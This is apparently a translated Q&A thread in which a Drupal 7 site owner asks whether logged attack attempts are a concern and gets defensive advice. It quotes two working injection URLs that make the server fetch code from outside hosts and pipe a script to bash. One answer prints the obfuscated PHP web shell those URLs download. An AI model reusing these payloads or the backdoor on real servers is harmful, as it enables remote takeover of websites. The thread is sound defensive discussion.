Dovrei essere preoccupato per questi tentativi di attacco del nome utente di Drupal 7?

3

Nei miei log vedo tentativi regolari, alcune volte al giorno come questi:

http://www.example.com/user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP
http://www.example.com/user/password/?name[%23post_render][]=system&name[%23markup]=wget+-O-+http://repo-linux.com/apply_patch.sh%7Cbash&name[%23type]=markup

My Drupal è aggiornato alla versione più recente. Devo preoccuparmene? C'è qualcosa che potrei fare per proteggere meglio?

    
posta MMT 21.04.2018 - 21:33
fonte

2 risposte

0

Sembra che l'utente malintenzionato tenti di scaricare lo script da questo sito Web (https://pastebin.com/raw/PeBdUg98) sul tuo server:

Questo è lo script (è sicuro per fare clic su questo link):

<?php
    $st = 'return value';
    $cap='bas'.'e6'.'4_d'.'ec'.'ode';
    $c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\''; // c = 'eval(bases64_decode('
    if(isset($_POST['uf']) && isset($_POST['pr'])) {  
        $arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);  
        array_walk($arr, strval($_POST['pr']), '');        
    }
?>

E nella seconda chiamata (a questo script - è sicuro cliccare sul link) prova a eseguire una patch sulla tua drupal.

Non penso che possa farlo funzionare - ma puoi imitare quello che sta facendo su un sito web fittizio che girerai e vedrai se funziona davvero.

Puoi controllare i tuoi log di accesso e se tutte le chiamate provengono dallo stesso blocco IP e fare una ricerca IP inversa a prova a trovare più informazioni sull'attaccante, eventualmente segnalalo al suo ISP.

Anche se non si tratta di phishing, puoi anche provare e inviare un rapporto qui: link

Buon lavoro con l'ultima versione di Drupal - se hai installato i plug-in prova anche a rimanere sulla loro ultima versione.

    
risposta data 22.04.2018 - 06:28
fonte
0

Ho fatto qualche ricerca e la cosa più vicina che posso trovare a quello che sta succedendo è delineata qui. Tuttavia, I non pensare che sia esattamente la stessa cosa Sembra che il tuo aggressore stia tentando di fare iniezioni di comandi, una delle quali sta tirando da pastebin, l'altra da GitHub. Vedere le fonti che l'utente malintenzionato sta tentando di includere potrebbe darti un'idea migliore di cosa sta tentando di sfruttare, ma tieni presente che si tratta di codice dannoso. Visita e indaga a tuo rischio prendendo le dovute precauzioni.

Non so come funzioni drupal al suo interno, ma mi auguro che una richiesta GET come quella che sta usando l'aggressore (poiché i parametri sono nell'URL) non sarebbe in grado di apportare modifiche all'attore. cercando di implementare.

Suggerirei di consultare alcuni registri di sistema per assicurarmi che non ci fosse accesso al server e garantire che non solo il CMS (Drupal) sia aggiornato, ma anche tutti i plugin e i temi. Se fai qualche ricerca in giro, potresti scoprire che anche un plugin aggiornato potrebbe avere delle vulnerabilità.

    
risposta data 21.04.2018 - 21:46
fonte

Leggi altre domande sui tag